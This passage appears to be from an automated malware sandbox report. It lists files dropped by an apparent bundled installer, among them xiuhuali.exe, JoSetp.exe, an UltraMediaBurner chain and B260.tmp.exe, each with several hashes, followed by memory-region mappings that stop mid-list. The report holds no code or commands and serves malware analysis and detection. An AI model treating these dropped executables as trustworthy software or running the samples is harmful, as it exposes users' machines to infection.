                                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-O9MD7.tmp\Ultra.exe
                                                                                                                MD5

                                                                                                                cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                SHA1

                                                                                                                ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                SHA256

                                                                                                                0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                SHA512

                                                                                                                49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-O9MD7.tmp\Ultra.exe
                                                                                                                MD5

                                                                                                                cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                SHA1

                                                                                                                ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                SHA256

                                                                                                                0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                SHA512

                                                                                                                49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-OCV6S.tmp\ultramediaburner.tmp
                                                                                                                MD5

                                                                                                                4e8c7308803ce36c8c2c6759a504c908

                                                                                                                SHA1

                                                                                                                a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                SHA256

                                                                                                                90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                                SHA512

                                                                                                                780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-OCV6S.tmp\ultramediaburner.tmp
                                                                                                                MD5

                                                                                                                4e8c7308803ce36c8c2c6759a504c908

                                                                                                                SHA1

                                                                                                                a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                SHA256

                                                                                                                90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                                SHA512

                                                                                                                780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-U49UK.tmp\Install.tmp
                                                                                                                MD5

                                                                                                                45ca138d0bb665df6e4bef2add68c7bf

                                                                                                                SHA1

                                                                                                                12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                                                SHA256

                                                                                                                3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                                                SHA512

                                                                                                                cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                                              • C:\Users\Admin\AppData\Roaming\B260.tmp.exe
                                                                                                                MD5

                                                                                                                ea25eed99d789d501256bde6903f9ef2

                                                                                                                SHA1

                                                                                                                0bb202dfaa9990d9190faae4845268e8b3aedd28

                                                                                                                SHA256

                                                                                                                58ee0619cba55d4a2ab6c7147d6c72be7f979ddefb638eb19545f25683f3bd67

                                                                                                                SHA512

                                                                                                                32926e421b6c1c594617e5d8a68569ba2057d4199311306fe1d4e2aa012794c586ff35b59c9ece06e67ec8597da6c4c8d3a349d47329e7453b74b2c6565e8511

                                                                                                              • C:\Users\Admin\AppData\Roaming\B260.tmp.exe
                                                                                                                MD5

                                                                                                                ea25eed99d789d501256bde6903f9ef2

                                                                                                                SHA1

                                                                                                                0bb202dfaa9990d9190faae4845268e8b3aedd28

                                                                                                                SHA256

                                                                                                                58ee0619cba55d4a2ab6c7147d6c72be7f979ddefb638eb19545f25683f3bd67

                                                                                                                SHA512

                                                                                                                32926e421b6c1c594617e5d8a68569ba2057d4199311306fe1d4e2aa012794c586ff35b59c9ece06e67ec8597da6c4c8d3a349d47329e7453b74b2c6565e8511

                                                                                                              • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • \Program Files\install.dll
                                                                                                                MD5

                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                SHA1

                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                SHA256

                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                SHA512

                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                              • \Program Files\install.dll
                                                                                                                MD5

                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                SHA1

                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                SHA256

                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                SHA512

                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                              • \Program Files\install.dll
                                                                                                                MD5

                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                SHA1

                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                SHA256

                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                SHA512

                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                              • \Program Files\install.dll
                                                                                                                MD5

                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                SHA1

                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                SHA256

                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                SHA512

                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                MD5

                                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                                SHA1

                                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                SHA256

                                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                SHA512

                                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                MD5

                                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                                SHA1

                                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                SHA256

                                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                SHA512

                                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                MD5

                                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                                SHA1

                                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                SHA256

                                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                SHA512

                                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                              • \Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                MD5

                                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                                SHA1

                                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                                SHA256

                                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                                SHA512

                                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                                              • \Users\Admin\AppData\Local\Temp\is-KA3LS.tmp\_isetup\_shfoldr.dll
                                                                                                                MD5

                                                                                                                92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                                SHA1

                                                                                                                3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                SHA256

                                                                                                                9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                SHA512

                                                                                                                9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                              • \Users\Admin\AppData\Local\Temp\is-KA3LS.tmp\_isetup\_shfoldr.dll
                                                                                                                MD5

                                                                                                                92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                                SHA1

                                                                                                                3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                SHA256

                                                                                                                9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                SHA512

                                                                                                                9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                              • \Users\Admin\AppData\Local\Temp\is-O9MD7.tmp\Ultra.exe
                                                                                                                MD5

                                                                                                                cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                SHA1

                                                                                                                ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                SHA256

                                                                                                                0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                SHA512

                                                                                                                49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                              • \Users\Admin\AppData\Local\Temp\is-O9MD7.tmp\_isetup\_shfoldr.dll
                                                                                                                MD5

                                                                                                                92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                                SHA1

                                                                                                                3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                SHA256

                                                                                                                9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                SHA512

                                                                                                                9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                              • \Users\Admin\AppData\Local\Temp\is-O9MD7.tmp\_isetup\_shfoldr.dll
                                                                                                                MD5

                                                                                                                92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                                                SHA1

                                                                                                                3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                SHA256

                                                                                                                9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                SHA512

                                                                                                                9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                              • \Users\Admin\AppData\Local\Temp\is-O9MD7.tmp\idp.dll
                                                                                                                MD5

                                                                                                                8f995688085bced38ba7795f60a5e1d3

                                                                                                                SHA1

                                                                                                                5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                                                                SHA256

                                                                                                                203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                                                                SHA512

                                                                                                                043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                                              • \Users\Admin\AppData\Local\Temp\is-OCV6S.tmp\ultramediaburner.tmp
                                                                                                                MD5

                                                                                                                4e8c7308803ce36c8c2c6759a504c908

                                                                                                                SHA1

                                                                                                                a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                                SHA256

                                                                                                                90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                                SHA512

                                                                                                                780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                                              • \Users\Admin\AppData\Local\Temp\is-U49UK.tmp\Install.tmp
                                                                                                                MD5

                                                                                                                45ca138d0bb665df6e4bef2add68c7bf

                                                                                                                SHA1

                                                                                                                12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                                                SHA256

                                                                                                                3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                                                SHA512

                                                                                                                cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                                              • \Users\Admin\AppData\Roaming\B260.tmp.exe
                                                                                                                MD5

                                                                                                                ea25eed99d789d501256bde6903f9ef2

                                                                                                                SHA1

                                                                                                                0bb202dfaa9990d9190faae4845268e8b3aedd28

                                                                                                                SHA256

                                                                                                                58ee0619cba55d4a2ab6c7147d6c72be7f979ddefb638eb19545f25683f3bd67

                                                                                                                SHA512

                                                                                                                32926e421b6c1c594617e5d8a68569ba2057d4199311306fe1d4e2aa012794c586ff35b59c9ece06e67ec8597da6c4c8d3a349d47329e7453b74b2c6565e8511

                                                                                                              • \Users\Admin\AppData\Roaming\B260.tmp.exe
                                                                                                                MD5

                                                                                                                ea25eed99d789d501256bde6903f9ef2

                                                                                                                SHA1

                                                                                                                0bb202dfaa9990d9190faae4845268e8b3aedd28

                                                                                                                SHA256

                                                                                                                58ee0619cba55d4a2ab6c7147d6c72be7f979ddefb638eb19545f25683f3bd67

                                                                                                                SHA512

                                                                                                                32926e421b6c1c594617e5d8a68569ba2057d4199311306fe1d4e2aa012794c586ff35b59c9ece06e67ec8597da6c4c8d3a349d47329e7453b74b2c6565e8511

                                                                                                              • memory/268-258-0x0000000000000000-mapping.dmp
                                                                                                              • memory/268-267-0x0000000000220000-0x000000000022C000-memory.dmp
                                                                                                                Filesize

                                                                                                                48KB

                                                                                                              • memory/288-177-0x0000000002150000-0x0000000002173000-memory.dmp
                                                                                                                Filesize

                                                                                                                140KB

                                                                                                              • memory/288-162-0x0000000000080000-0x000000000008D000-memory.dmp
                                                                                                                Filesize

                                                                                                                52KB

                                                                                                              • memory/288-160-0x0000000000000000-mapping.dmp
                                                                                                              • memory/288-178-0x00000000021D0000-0x0000000002218000-memory.dmp
                                                                                                                Filesize

                                                                                                                288KB

                                                                                                              • memory/368-59-0x0000000076661000-0x0000000076663000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/592-106-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/592-103-0x0000000000000000-mapping.dmp
                                                                                                              • memory/868-95-0x0000000000F80000-0x0000000000FCB000-memory.dmp
                                                                                                                Filesize

                                                                                                                300KB

                                                                                                              • memory/868-96-0x0000000001370000-0x00000000013E0000-memory.dmp
                                                                                                                Filesize

                                                                                                                448KB

                                                                                                              • memory/868-228-0x0000000000A80000-0x0000000000ACB000-memory.dmp
                                                                                                                Filesize

                                                                                                                300KB

                                                                                                              • memory/868-229-0x0000000001120000-0x0000000001190000-memory.dmp
                                                                                                                Filesize

                                                                                                                448KB

                                                                                                              • memory/912-173-0x0000000000000000-mapping.dmp
                                                                                                              • memory/912-183-0x00000000002B0000-0x00000000002F4000-memory.dmp
                                                                                                                Filesize

                                                                                                                272KB

                                                                                                              • memory/920-243-0x0000000000000000-mapping.dmp
                                                                                                              • memory/940-179-0x000007FEFBDC1000-0x000007FEFBDC3000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/940-176-0x0000000000000000-mapping.dmp
                                                                                                              • memory/944-240-0x0000000000000000-mapping.dmp
                                                                                                              • memory/968-256-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1028-306-0x0000000004A42000-0x0000000004A43000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1028-305-0x0000000004A40000-0x0000000004A41000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1244-269-0x0000000002B20000-0x0000000002B37000-memory.dmp
                                                                                                                Filesize

                                                                                                                92KB

                                                                                                              • memory/1320-148-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1320-129-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1320-137-0x0000000074201000-0x0000000074203000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1364-278-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1376-227-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1468-155-0x000007FEF2430000-0x000007FEF34C6000-memory.dmp
                                                                                                                Filesize

                                                                                                                16.6MB

                                                                                                              • memory/1468-150-0x0000000001FB0000-0x0000000001FB2000-memory.dmp
                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/1468-145-0x0000000000000000-mapping.dmp
                                                                                                              • memory/1468-199-0x0000000001FB6000-0x0000000001FD5000-memory.dmp
                                                                                                                Filesize

                                                                                                                124KB

                                                                                                              • memory/1468-200-0x000000001ADB0000-0x000000001ADC9000-memory.dmp
                                                                                                                Filesize

                                                                                                                100KB

                                                                                                              • memory/1468-201-0x0000000001FD5000-0x0000000001FD6000-memory.dmp
